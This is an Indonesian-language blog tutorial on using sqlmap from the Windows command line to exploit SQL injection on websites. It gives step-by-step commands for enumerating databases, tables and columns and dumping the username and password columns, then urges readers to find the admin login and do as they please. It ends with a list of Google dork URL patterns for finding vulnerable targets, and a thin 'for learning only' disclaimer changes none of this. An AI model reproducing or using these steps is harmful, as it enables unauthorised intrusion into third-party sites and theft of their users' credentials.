1 Tutorial sqlmap menggunakan python di CMD

Hello apa kabar pasti baik semuanya pasti nya kan :) oke kali ini gue akan share Tutorial sqlmap menggunakan python di CMD

sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

ok, langsung saja download dulu alat perang nya di bawa sini  :

+=|python 2.7|=+

+=|sqlmap|=+

untuk tutorialnya :

1. download kedua file di atas, instal python taro di desktop , extrack sqlmap nya

    misalkan gue extrack sqlmap di Folder Python

Perintah nya :/

•  cd desktop
•  cd Python
•  cd sqlmap
• sqlmap.py -u Masukan Target lo --dbs

Lalu Tekan ENTER :)




Nanti akan Seperti ini 



Lalu Enter Saja , dan mulai lah cari target dengan masukan perintah 

• sqlmap.py -u Masukan URL target lo --dbs

 Jika muncul pertanyan sejenis atau serupa/sebentuk dan seperti ini
 "GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter saja
Kalo sudah menemukan tables pada website yg vuln ketikan perintah tersebut

• sqlmap.py -u (Masukan Taget lo) -D (nama tables target lo ) --tables [enter]

fungsi :
           -u = url
          -D = database
   --tables = untuk mendapatkan tables dari database

Misalnya tables gue ini
[11 tables]
+-------------------+
| areas                      |
| categories               |
| featured                  |
| fields                      |
| jobfields                 |
| member_areas        |
| member_categories |
| member_fields        |
| members                |
| projects                  |
| users                      |
+-------------------+

sekarang kita lihat dari tabel2 tersebut kira kira user id dan password nya dimna ?
    mari kita check dengan perintah:

•     sqlmap.py -u (Masukan Taget lo) -D (nama tables target lo ) -T (nama columns target lo) --columns [enter]

  -T = nama table
   --columns  = melihat columns di table

kita telah mendapat kan nama column dari tabel users

Sekarang kita akan melihat isi dari column tersebut, dalam hal ini kita cukup melihat isi dari column password dan username saja, dengan memasukan perintah :

• sqlmap.py -u (Masukan Taget lo) -D (nama tables target lo ) -T (nama columns target lo) -C password,username --dump

fungsi :
          -C =  nama column
   --dump =  melihat data di column
klo ktemu nama passwrod dan unser admin nya setrah lo dah mao lo apain dah tuh dosa di tangung lo oya jangan lupa lo cari admin login nya :v

saya tidak bertanggung jawab atas apa yang lo lakukan, ini hanya untuk materi pembelajaran saja

Semoga bermanfaat, Terima kasih :)

untuk dork google nya bisa sedot disini masi fress

• about.php?cartID=
• accinfo.php?cartId=
• acclogin.php?cartID=
• add.php?bookid=
• add_cart.php?num=
• addcart.php?
• addItem.php
• add-to-cart.php?ID=
• addToCart.php?idProduct=
• addtomylist.php?ProdId=
• adminEditProductFields.php?intProdID=
• advSearch_h.php?idCategory=
• affiliate.php?ID=
• affiliate-agreement.cfm?storeid=
• affiliates.php?id=
• ancillary.php?ID=
• archive.php?id=
• article.php?id=
• phpx?PageID
• basket.php?id=
• Book.php?bookID=
• book_list.php?bookid=

Artikel Terkait :